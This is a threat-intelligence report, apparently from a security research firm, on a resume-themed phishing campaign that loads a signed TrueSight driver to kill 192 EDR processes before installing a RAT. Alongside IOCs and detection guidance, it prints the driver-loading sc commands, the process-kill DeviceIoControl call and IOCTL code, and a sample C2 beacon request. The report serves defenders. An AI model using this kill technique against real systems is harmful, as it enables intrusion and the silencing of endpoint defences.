mediumPhishing

BlackSanta: How a Legitimately Signed Windows Driver Became a 192-Process EDR Killer

InvestigatedMarch 16, 2026PublishedMarch 16, 2026

phishingsocial-engineeringc2ransomwareexploitspearphishing

Published: 2026-03-16 | Author: BGI | Investigation Date: 2026-03-16

TL;DR

A Russian-speaking threat actor we are tracking as BlackSanta is running a multi-stage spearphishing campaign targeting HR departments with resume-themed lures delivered via Dropbox-hosted ISOs. The payload chain is unusually sophisticated: steganographic extraction from images, DLL side-loading through a legitimate SumatraPDF binary, and -- critically -- a Bring Your Own Vulnerable Driver (BYOVD) attack using Adlice's TrueSight v3.1.0 kernel driver to terminate 192 EDR/AV processes from ring 0 before the real RAT even executes. The driver is WHCP-signed by Microsoft with a DigiCert countersignature valid until 2033, meaning it loads without restriction on every Windows 10/11 system and will continue to do so for the next seven years. Post-EDR-kill, the RAT hollows into winlogon.exe, installs a rogue root CA for HTTPS MITM, and beacons to an ASP.NET C2 panel at 157.250.202.215 whose response headers betray a windows-1251 Cyrillic charset. The operator's fatal OPSEC mistake: registering phishing domains across a four-month span using identical WHOIS data -- the same Proton Mail address, the same fabricated Waldorf Astoria hotel address -- on .us TLDs that do not support WHOIS privacy. One email. Total infrastructure linkage. The campaign has been active since at least October 2025 and remains operational as of March 2026.

Campaign Overview

Microsoft signed it. DigiCert timestamped it. And now it's being used to nuke every endpoint security product on the market from kernel ring 0.

BlackSanta is a textbook example of why BYOVD remains one of the most dangerous attack primitives in the Windows ecosystem. The weapon of choice: Adlice's TrueSight v3.1.0 driver -- a legitimate anti-rootkit component with a Windows Hardware Compatibility Publisher (WHCP) attestation that makes it fully trusted on every modern Windows machine. The operator behind it all? A Russian-speaking threat actor who registered their phishing infrastructure using a Waldorf Astoria hotel address and the same Proton Mail account across every domain. Twice.

This is not a novel technique -- BYOVD has been documented in campaigns by Lazarus, BlackByte, and Cuba ransomware gangs. What makes BlackSanta notable is the combination of a highly capable kill list (192 processes), an attack chain designed specifically for social engineering HR personnel, and operational security so poor that it collapses the entire infrastructure into a single attribution pivot.

The Kill Chain

BlackSanta targets HR departments through resume-themed spear-phishing. The lure is a Dropbox-hosted ISO image containing what appears to be a PDF resume. It isn't.

The full infection chain runs six phases deep:

                        BlackSanta Kill Chain
 ===================================================================

 [1] DELIVERY                [2] STEGANOGRAPHIC STAGING
 +-------------------+       +---------------------------+
 | Phishing email    |       | LNK -> PowerShell         |
 | willy.bairon@     |------>| Base64 decode             |
 |   proton.me       |       | Download image from       |
 | Dropbox ISO link  |       | resumebuilders.us         |
 | .LNK inside       |       | LSB stego extraction      |
 +-------------------+       | -> Download_boss.zip      |
                              +---------------------------+
                                          |
                                          v
 [3] DLL SIDE-LOADING        [4] BYOVD EDR KILL
 +-------------------+       +---------------------------+
 | SumatraPDF.exe    |       | Drop truesight.sys        |
 | (legit, signed)   |       | sc create TrueSight       |
 | imports DWrite.dll |------>| type=kernel               |
 | from CWD first    |       | IOCTL 0x22E044 x 192     |
 | Sandbox checks:   |       | ZwTerminateProcess()      |
 |  - "Johnson" user |       | Ring 0 kill: all EDR/AV   |
 |  - Debugger check |       | Unload + delete driver    |
 |  - Memory check   |       +---------------------------+
 +-------------------+                    |
                                          v
 [5] PERSISTENCE             [6] C2 BEACON
 +-------------------+       +---------------------------+
 | SeDebugPrivilege  |       | POST /login.aspx          |
 | Process hollow    |       | Host: 157.250.202.215     |
 | -> winlogon.exe   |------>| Bearer: 2ca8ce1a...       |
 | Rogue root CA     |       | AES-encrypted body:       |
 | HTTPS MITM proxy  |       |   hostname, SMBIOS ID,    |
 | Schtask persist   |       |   language, username      |
 | Defender tampering |       | charset=windows-1251      |
 +-------------------+       +---------------------------+

Phase 1 -- Delivery

A phishing email from willy.bairon@proton.me hits the HR inbox. The link points to a Dropbox-hosted ISO. Inside: a .LNK shortcut masquerading as a resume document. ISO mounting is native in Windows 10/11, and .LNK files inside mounted ISOs bypass Mark-of-the-Web (MotW) protections -- the file doesn't inherit the Zone.Identifier alternate data stream, so SmartScreen never fires.

Phase 2 -- Steganographic Staging

The LNK fires a hidden PowerShell process with a Base64-encoded command. That command downloads an image from resumebuilders.us or newresumebuilders.us and extracts the real payload from LSB (Least Significant Bit) steganography embedded in the image data. The result is Download_boss.zip, which extracts to %TEMP% as two files: SumatraPDF.exe and DWrite.dll.

Using steganography for staging is a deliberate choice to evade network-level content inspection. The downloaded file is a valid image. It renders correctly. The payload is invisible to any DLP or proxy scanning for executable content in transit.

Phase 3 -- DLL Side-Loading

SumatraPDF.exe is a legitimate, signed PDF reader (v3.5.2, signed by Krzysztof Kowalczyk). It imports DWriteCreateFactory from DWrite.dll, searching the current directory before System32. The malicious DLL hijacks this import, executes its initialization routine, then proxies the call to the real DirectWrite library. The victim sees a PDF reader launch. Everything looks normal.

Before proceeding, the RAT checks three tripwires:

Check	Method	Purpose
Username == "Johnson"	`GetUserNameW`	Known sandbox identity evasion
Remote debugger attached	`CheckRemoteDebuggerPresent`	Anti-analysis
System memory below threshold	`GlobalMemoryStatusEx`	VM detection (VMs typically have low RAM)

If any check fires, the malware exits cleanly. No crash. No IOC. Just a PDF reader that opened and closed.

Phase 4 -- The BYOVD Kill

This is where it gets interesting.

The malware drops truesight.sys and installs it as a kernel service:

sc create TrueSight type= kernel binPath= C:\Windows\System32\drivers\truesight.sys
sc start TrueSight

The driver loads without complaint. It's WHCP-signed by Microsoft. The code-signing cert from Adlice expired in April 2023, but the DigiCert countersignature timestamp from May 2022 is valid until 2033. Windows accepts this. No HVCI bypass needed. No exploit required. The trust chain is intact.

Once loaded, the driver exposes a device at \\.\TrueSight that any user-mode process can open. The malware then enumerates all running processes and, for each of 192 known EDR/AV process names, sends a single IOCTL:

// For each of 192 AV/EDR process IDs:
DeviceIoControl(hDevice, 0x22E044, &targetPid, 4, NULL, 0, &bytesReturned, NULL);

IOCTL 0x22E044 triggers the driver to call ZwOpenProcess followed by ZwTerminateProcess from kernel context. Ring 0. Game over. Protected Process Light (PPL) doesn't help -- the kill happens from the kernel, not userspace. Every major EDR, AV, and security monitoring tool on the endpoint dies before the real payload even starts executing.

The kill list covers the entire commercial and enterprise security landscape: CrowdStrike Falcon, SentinelOne, Carbon Black, Cylance, Sophos, ESET, Kaspersky, Bitdefender, Malwarebytes, Windows Defender, Trend Micro, Symantec, McAfee, Palo Alto Cortex XDR, and dozens more. 192 process names. One IOCTL each. Four bytes in, one dead process out.

After the carnage, the driver is unloaded, the service deleted, and the .sys file removed. Clean entry. No artifacts left on disk.

Phase 5 -- Persistence and Evasion

With endpoint security eliminated, the RAT establishes deep persistence:

Escalates to SeDebugPrivilege via AdjustTokenPrivileges
Creates a suspended winlogon.exe process and hollows it (process injection host)
Installs a rogue root certificate (0174E68C97DDF1E0EEEA415EA336A163D2B61AFD) into HKCU\SystemCertificates\Root
Sets proxy to %HTTP_PROXY%:8080 for HTTPS interception via the rogue CA
Creates a scheduled task under Microsoft\Windows\MemoryDiagnostic\ for persistence
Tampers with Windows Defender SpyNet reporting policies via registry
Hides its window and self-deletes the original DWrite.dll

The winlogon.exe hollowing is particularly effective. It's a critical system process -- killing it causes an immediate BSOD. Most incident responders won't terminate it during triage, and most EDR tools (if they were still running) wouldn't flag process creation of a known Windows binary.

Phase 6 -- C2 Beacon

The hollowed winlogon.exe begins beaconing:

POST /login.aspx HTTP/1.1
Host: 157.250.202.215
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Content-Type: application/x-www-form-urlencoded; charset=utf-8;
Bearer: 2ca8ce1abf92649805c9d2df09049b75420dc2642f191e11caddd3ea452b67ba

<AES-encrypted body: hostname, SMBIOS hardware ID, language, username>

Note the non-standard Bearer: header -- not Authorization: Bearer, just Bearer: as a raw custom header. The hardcoded bearer token and the /login.aspx endpoint on a raw IP running ASP.NET Core behind nginx on Ubuntu. Not exactly blending in.

The Driver: A Deeper Look

The TrueSight v3.1.0 driver (truesight.sys) is a 41,920-byte PE64 native kernel binary. It was originally built as part of Adlice's RogueKiller anti-rootkit product -- a legitimate security tool. The PDB path confirms the build environment:

E:\Adlice\Truesight\x64\Release\truesight.pdb

Signature Chain Analysis

The signature chain tells the story of how a legitimate driver becomes an attacker's best friend:

[Subject]  ADLICE (Julien ASCOET)
[Issuer]   Sectigo Public Code Signing CA EV R36
[Valid]    2022-04-08 to 2023-04-08  -- EXPIRED

[Subject]  Microsoft Windows Hardware Compatibility Publisher
[Issuer]   Microsoft Windows Third Party Component CA 2012
[Valid]    2022-03-10 to 2023-03-08  -- EXPIRED

[Counter-Signer]  DigiCert Timestamp 2022-2
[Valid]            2022-03-29 to 2033-03-14  -- STILL VALID

The WHCP attestation combined with a valid countersignature timestamp means this driver will load on any Windows system for the next seven years. It's on VirusTotal with a detection rate of 5 out of 72 engines. Five. That's a 93% miss rate across the entire AV industry for a driver actively being used to kill their own products.

Kernel Import Table

The kernel imports tell you exactly what this driver can do:

Import	Capability
`ZwTerminateProcess`	Kill any process from kernel space
`ZwOpenProcess`	Open any process by PID with kernel privileges
`ZwQuerySystemInformation`	Enumerate all running processes
`KeInitializeApc` / `KeInsertQueueApc`	Kernel APC injection
`MmProbeAndLockPages` / `MmMapLockedPagesSpecifyCache`	Kernel-to-usermode memory R/W
`ZwDeleteKey`	Registry key deletion (anti-forensic)
`KeBugCheckEx`	Intentional BSOD capability

The APC injection and memory mapping imports are particularly concerning. They suggest the driver has capabilities beyond simple process termination -- kernel-to-usermode memory read/write and asynchronous procedure call injection could be used for code injection, credential harvesting, or kernel-level rootkit behavior. BlackSanta is only using the process kill IOCTL today, but the driver's full capability surface is much wider.

IOCTL Dispatch

The IOCTL dispatch at binary offset 0xBF2 is straightforward:

mov    eax, 0x22E044
cmp    dword [rdi+0x18], eax     ; compare incoming IOCTL code
jne    dispatch_next
; Input:  4-byte ULONG ProcessId in SystemBuffer
; Action: ZwOpenProcess(PID) -> ZwTerminateProcess()
; Runs at IRQL PASSIVE_LEVEL in kernel context
; Ignores PPL -- kills AV/EDR with Protected Process Light

Four bytes in, one dead process out. Repeat 192 times.

The RAT: DWrite.dll

The side-loaded DWrite.dll is a 496 KB PE64 DLL compiled with MSVC 2022 on January 28, 2026 -- fresh. It exports a single function (DWriteCreateFactory, ordinal #1) to maintain the side-loading ruse.

Capability Matrix

Category	Technique	Detail
Anti-VM	Username check	Exits if user is "Johnson" (sandbox fingerprint)
Anti-Debug	`CheckRemoteDebuggerPresent`	Bails if debugger attached
Encryption	AES via WinCrypt	`CryptAcquireContext` + `CryptImportKey` + `CryptDecrypt`
Encoding	XOR + Base64 + Mersenne Twister	Multi-layer string obfuscation
Process Injection	Process hollowing	`CreateProcess(SUSPENDED)` into `winlogon.exe`
Defense Evasion	Parent PID spoofing	`PROC_THREAD_ATTRIBUTE_PARENT_PROCESS`
Defense Evasion	Stack strings	Obfuscated strings rebuilt at runtime
MITM	Rogue root CA install	HTTPS interception via local proxy on `:8080`
Recon	SMBIOS fingerprinting	`GetSystemFirmwareTable("RSMB")` for hardware ID
Recon	Language ID check	`GetUserDefaultLangID` -- likely excludes RU/CIS targets
Collection	Window harvesting	`EnumWindows` + `GetWindowTextW` for credential scraping
Persistence	Scheduled task	Under `Microsoft\Windows\MemoryDiagnostic\`

The language ID check is a common tell. Russian-speaking threat actors frequently exclude CIS locale machines from infection, either out of operational security or -- more pragmatically -- self-preservation. You don't target your own government's citizens when your government is your cover.

Infrastructure and Attribution

The BlackSanta operator runs a lean infrastructure setup across two US-based VPS providers, both subsidiaries of Interserver:

                  BlackSanta Infrastructure Map
 ================================================================

 PHISHING LAYER                    C2 LAYER
 +-------------------------+       +---------------------------+
 | resumebuilders.us       |       | 157.250.202.215 (PRIMARY) |
 | newresumebuilders.us    |       | AS19318 - Interserver     |
 | (Namecheap, ~Oct 2025) |       | Secaucus, NJ              |
 |                         |       | nginx/1.24.0 + ASP.NET    |
 | Stego image hosting     |       | /login.aspx               |
 | Dropbox ISO delivery    |       | windows-1251 charset      |
 +----------+--------------+       +-------------+-------------+
            |                                     |
            | WHOIS pivot:                        |
            | willy.bairon@proton.me               |
            |                                     |
 +----------+--------------+       +-------------+-------------+
 | thresumebuilder.com     |       | 163.245.212.11 (SECONDARY)|
 | (Namecheap, Feb 2026)  +-------+ AS17 - trouble-free.net   |
 | Sectigo DV cert         |       | Westville, NJ             |
 | Identical WHOIS         |       | vps3289065.trouble-free   |
 +-------------------------+       +---------------------------+

 REGISTRANT (all domains):
   Name:    Will Bairon
   Email:   willy.bairon@proton.me
   Phone:   +1.563.210.8642 (Iowa area code)
   Address: Park Ave, Waldorf Astoria New York 313, NY 10022

Primary C2 -- 157.250.202.215

AS19318, Interserver, Secaucus NJ
OpenSSH 9.6p1 Ubuntu on port 22
ASP.NET Core panel behind nginx/1.24.0 on port 443
C2 endpoint: https://157.250.202.215/login.aspx
Server response header: charset=windows-1251 -- Cyrillic locale on the C2 server

Secondary C2 / Staging -- 163.245.212.11

AS17, trouble-free.net, Westville NJ
VPS hostname: vps3289065.trouble-free.net
Hosts thresumebuilder.com with Sectigo DV cert issued 2026-02-11
Active as of Shodan scan on 2026-03-07

Phishing Domains

All registered through Namecheap:

Domain	Created	Status	VT Detections
`resumebuilders.us`	2025-10-28	Active	15/94
`newresumebuilders.us`	~Oct 2025	Down	14/94
`thresumebuilder.com`	2026-02-11	Active	17/94

Note the typo in thresumebuilder.com -- it's meant to read "the resume builder" but the operator dropped an "e". Whether this is intentional typosquatting or a genuine misspelling from a non-native English speaker is an open question. Given the other evidence, we lean toward the latter.

The OPSEC Failure

Every investigation has one. This one is a classic.

The threat actor registered both resumebuilders.us (October 2025) and thresumebuilder.com (February 2026) using identical WHOIS registration data:

Name:     Will Bairon
Email:    willy.bairon@proton.me
Phone:    +1.5632108642
Address:  Park Avenue, Waldorf Astoria New York 313
          New York, NY 10022

The address is the Waldorf Astoria hotel. The phone number uses an Iowa area code (563) -- almost certainly fabricated. And here's the kicker: .us TLD registrations do not support WHOIS privacy services. ICANN policy for .us domains requires accurate registrant data to be publicly visible. The operator either didn't know this or didn't care.

Using the same Proton Mail address across multiple domain registrations four months apart created a single pivot point that links the entire campaign infrastructure together. One email address. One phone number. One fake hotel address. All roads lead back to willy.bairon@proton.me.

Combined with the windows-1251 Cyrillic charset in the C2 response headers, the CIS locale exclusion in the RAT, and the infrastructure pattern of cheap US-based VPS providers favored by Eastern European actors -- this points firmly to a Russian-speaking operator. Not necessarily Russian government. Not necessarily sophisticated. But operationally capable enough to build a six-stage kill chain with kernel-level EDR evasion, and careless enough to register infrastructure under the same throwaway email twice.

Indicators of Compromise

File Hashes

SHA256	MD5	Filename	Role
`83fcc6bf733751bab43e92d31b810c4cecd4d8640668d2ed26f47f62edd942cf`	`2e2924471ff377774f5ba61e9643f0c9`	`truesight.sys`	BYOVD kernel driver
`d3d4b8bd76a26448426c89e6e401cff2cd9350c09aad52cc33d4ca3866bea918`	`4a209ccf6dc970ccc6d2ead4c59321d9`	`DWrite.dll`	RAT payload
`47f659d6152ad612abc514b8b9e0aadfa69cb0b7b27426c37e63f85ead2a7b13`	`6976b8cb354a6082b6649043f1fa10e8`	`Download_boss.zip`	Delivery archive
`290e4aa7ed64c728138711c011e89aab7aa48dbc1ae430371dc2be4100b92bf0`	--	`SumatraPDF.exe`	Legitimate side-load vehicle
`74b3152a28d4f1a4fff46b279abf0eef666df0f8245efae1e71e6e375889ff70`	--	`taskkill.exe`	Dropped utility

Network Indicators

Indicator	Type	Context
`157.250.202.215`	IPv4	Primary C2 -- ASP.NET panel, `/login.aspx`
`163.245.212.11`	IPv4	Secondary C2 / staging server
`resumebuilders.us`	Domain	Phishing / steganographic payload staging
`www.resumebuilders.us`	Domain	Phishing
`newresumebuilders.us`	Domain	Phishing / staging (currently down)
`thresumebuilder.com`	Domain	Active C2 domain
`www.thresumebuilder.com`	Domain	Active C2 domain
`vps3289065.trouble-free.net`	Hostname	C2 server VPS identifier
`https://157.250.202.215:443/login.aspx`	URL	C2 beacon endpoint
`2ca8ce1abf92649805c9d2df09049b75420dc2642f191e11caddd3ea452b67ba`	Bearer Token	Hardcoded C2 auth token in DWrite.dll

Host-Based Indicators

Indicator	Type	Context
`\\.\TrueSight`	Device path	BYOVD driver user-mode access point
`\Device\TrueSight`	Kernel object	Driver device object
`0174E68C97DDF1E0EEEA415EA336A163D2B61AFD`	Cert thumbprint	Rogue root CA for HTTPS MITM
`E:\Adlice\Truesight\x64\Release\truesight.pdb`	PDB path	Build artifact in driver binary
`Microsoft\Windows\MemoryDiagnostic\`	Schtask path	Persistence location
`%APPDATA%\MyApp\Config\settings.ini`	File path	RAT configuration file
`%TEMP%\myapp_firstlaunch.tmp`	File path	First-run execution marker

Registry Indicators

Key	Value	Purpose
`HKCU\...\SystemCertificates\Root\Certificates\0174E68C...\Blob`	Binary	Rogue root CA installation
`HKCU\...\Internet Settings\ProxyEnable`	`1`	Enables MITM proxy
`HKCU\...\Internet Settings\ProxyServer`	`%HTTP_PROXY%:8080`	Routes traffic through interceptor

WHOIS / Registration

Field	Value
Registrant Name	Will Bairon
Email	`willy.bairon@proton.me`
Phone	`+1.5632108642`
Address	Park Avenue, Waldorf Astoria New York 313, NY 10022
Registrar	Namecheap

MITRE ATT&CK Mapping

ID	Technique	Evidence
T1566.002	Phishing: Spearphishing Link	Resume-themed lure via Dropbox ISO to HR departments
T1027.009	Obfuscated Files: Embedded Payloads	Steganographic payload extraction from downloaded images
T1574.002	Hijack Execution Flow: DLL Side-Loading	`DWrite.dll` loaded via legitimate `SumatraPDF.exe`
T1553.006	Subvert Trust Controls: Code Signing	WHCP-signed driver with valid timestamp loads without restriction
T1068	Exploitation for Privilege Escalation	IOCTL `0x22E044` exploits TrueSight for ring-0 process termination
T1014	Rootkit	Kernel driver with memory R/W and APC injection capability
T1562.001	Impair Defenses: Disable/Modify Tools	192 EDR/AV processes killed via BYOVD before payload execution
T1055.012	Process Injection: Process Hollowing	`winlogon.exe` hollowed as RAT host process
T1053.005	Scheduled Task/Job	Persistence via `MemoryDiagnostic\` task namespace
T1553.004	Subvert Trust Controls: Install Root Certificate	Rogue CA for HTTPS interception
T1040	Network Sniffing	Rogue CA + local proxy enables full HTTPS MITM
T1036.005	Masquerading: Match Legitimate Name	`DWrite.dll` impersonates Windows DirectWrite API
T1070.004	Indicator Removal: File Deletion	Self-deletion of DWrite.dll and truesight.sys post-execution
T1071.001	Application Layer Protocol: Web	HTTPS POST beacon to `/login.aspx`
T1573.001	Encrypted Channel: Symmetric Cryptography	AES-encrypted C2 traffic
T1548.002	Abuse Elevation Control	`SeDebugPrivilege` escalation via `AdjustTokenPrivileges`
T1082	System Information Discovery	SMBIOS fingerprinting, hostname, memory enumeration
T1057	Process Discovery	`ZwQuerySystemInformation` for full process enumeration
T1497.001	Virtualization/Sandbox Evasion	Username, memory, and debugger checks
T1112	Modify Registry	Defender policy tampering, proxy configuration, cert installation
T1543.003	Create/Modify System Process: Windows Service	Driver loaded via `sc create TrueSight type=kernel`
T1041	Exfiltration Over C2 Channel	AES-encrypted data exfil via POST requests
T1005	Data from Local System	Window text harvesting for browser/form credentials

Detection and Defense Recommendations

Immediate Actions

Block the driver hash in WDAC vulnerable driver block lists. Full SHA256: 83fcc6bf733751bab43e92d31b810c4cecd4d8640668d2ed26f47f62edd942cf. If you're running Microsoft's recommended driver blocklist, verify this hash is included -- as of this writing, detection across the AV industry is at 5/72.
Alert on \\.\TrueSight device access. Any process opening this device handle is almost certainly weaponizing the driver. This is a high-fidelity detection -- there is no legitimate reason for an arbitrary user-mode process to interact with this device.
Monitor certificate stores. New entries under HKCU\Software\Microsoft\SystemCertificates\Root\Certificates\ should trigger immediate investigation. Sysmon Event ID 12/13 (RegistryEvent) or equivalent will catch this.
Flag DWrite.dll loads from non-system paths. Legitimate DWrite.dll lives in System32 and SysWOW64. Any load from %TEMP%, Downloads, or an application directory that isn't the Windows font subsystem is suspicious. Sysmon Event ID 7 (Image loaded) with path exclusions is your friend here.

Network-Level Blocks

DNS-block all campaign domains: resumebuilders.us, newresumebuilders.us, thresumebuilder.com and their www. subdomains.
IP-block both C2 servers: 157.250.202.215/32, 163.245.212.11/32. These are single-tenant VPS IPs with no legitimate services.

Threat Hunting Queries

Hunt for scheduled tasks under Microsoft\Windows\MemoryDiagnostic\ that you didn't create. This is a legitimate Windows namespace that the operator is abusing for blend-in persistence. Compare against your baseline.
Network detection: POST requests to /login.aspx with a non-standard Bearer: header (note: not Authorization: Bearer, just Bearer: as a raw custom header). This is a high-confidence network signature. The Firefox 118.0 User-Agent string combined with the raw Bearer header is distinctive enough for a Suricata rule.
Proxy configuration monitoring: Alert on changes to HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable and ProxyServer values. Rogue proxy installation is a prerequisite for the HTTPS MITM capability.

Strategic Guidance

Enable HVCI (Hypervisor-Protected Code Integrity) where possible. While BlackSanta's specific driver doesn't require an HVCI bypass, HVCI + Microsoft's vulnerable driver blocklist is the most effective systemic defense against BYOVD attacks. The blocklist is opt-in for most configurations -- make sure it's actually enabled.
Audit your driver load policy. If your organization doesn't need arbitrary kernel driver loading, consider enforcing a driver allowlist via WDAC. This is the nuclear option but it eliminates the entire BYOVD attack surface.

YARA rules and Suricata signatures for automated detection are available in the full investigation package.

Investigation by GHOST -- Breakglass Intelligence. "One indicator. Total infrastructure."